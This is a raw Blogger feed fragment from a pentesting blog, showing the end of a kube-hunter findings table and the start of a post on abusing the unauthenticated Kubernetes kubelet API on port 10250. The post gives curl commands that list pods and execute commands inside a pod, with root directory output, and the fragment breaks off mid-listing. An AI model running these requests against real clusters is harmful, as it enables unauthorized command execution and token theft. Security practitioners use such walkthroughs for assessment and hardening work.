new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:10255\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Information\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Cluster Health\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| By accessing the\u0026nbsp; \u0026nbsp; \u0026nbsp;| status: ok\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Disclosure\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| open \/healthz\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | handler, an attacker |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | could get the\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | cluster health state |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | without\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | authenticating\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:2379\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Access Risk\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Etcd Remote Read\u0026nbsp; \u0026nbsp; \u0026nbsp;| Remote read access\u0026nbsp; \u0026nbsp;| {\"action\":\"get\",\"nod |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Access Event\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| might expose to an\u0026nbsp; \u0026nbsp;| e\":{\"dir\":true,\"node |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | attacker cluster's\u0026nbsp; \u0026nbsp;| ...\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | possible exploits,\u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | secrets and more.\u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:10255\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Access Risk\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | Privileged Container | A Privileged\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| pod: node-exporter-\u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | container exist on a | 1fmd9-z9685,\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | node. could expose\u0026nbsp; \u0026nbsp;| containe...\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | the node\/cluster to\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | unwanted root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | operations\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+---------------------+----------------------+----------------------+----------------------+----------------------+\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/1446529168694232824\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=1446529168694232824","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1446529168694232824"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1446529168694232824"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-kube-hunter-10255.html","title":"Kubernetes: Kube-Hunter 10255"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/2.bp.blogspot.com\/-vNl4SRm4Jlg\/XDN4gXjhftI\/AAAAAAAACZI\/2sA7DjWUTqIVQXt_OHO9dZZUFnixRMSzwCLcBGAs\/s72-c\/10255-pods.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-6234181538420825341"},"published":{"$t":"2019-01-16T09:00:00.001-05:00"},"updated":{"$t":"2019-01-16T09:00:15.423-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: unauth kublet API 10250 token theft \u0026 kubectl"},"content":{"type":"html","$t":"Kubernetes: unauthenticated kublet API (10250) token theft \u0026amp; kubectl access \u0026amp; exec\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nkube-hunter output to get us started:\n\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/c88e15a99e37b4d090afb77cb56cc4c2.js\"\u003E\u003C\/script\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\ndo a \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -s\u0026nbsp;https:\/\/k8-node:10250\/runningpods\/ \u003C\/span\u003Eto get a list of running pods\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nWith that data, you can craft your post request to exec within a pod so we can poke around.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u0026nbsp;Example request:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -k -XPOST \"https:\/\/k8-node:10250\/run\/kube-system\/kube-dns-5b1234c4d5-4321\/dnsmasq\" -d \"cmd=ls -la \/\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nOutput:\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Etotal 35264\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 .\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 ..\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Nov\u0026nbsp; 9 16:27 .dockerenv\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 bin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;380 Nov\u0026nbsp; 9 16:27 dev\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; 36047205 Apr 13\u0026nbsp; 2018 dnsmasq-nanny\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 etc\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 home\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 lib\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 media\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 mnt\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edr-xr-xr-x\u0026nbsp; 134 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Nov\u0026nbsp; 9 16:27 proc\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwx------\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 root\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 run\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 sbin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 srv\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edr-xr-xr-x\u0026nbsp; \u0026nbsp;12 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Dec 19 19:06 sys\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxrwxrwt\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 17:00 tmp\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 7 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 usr\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier 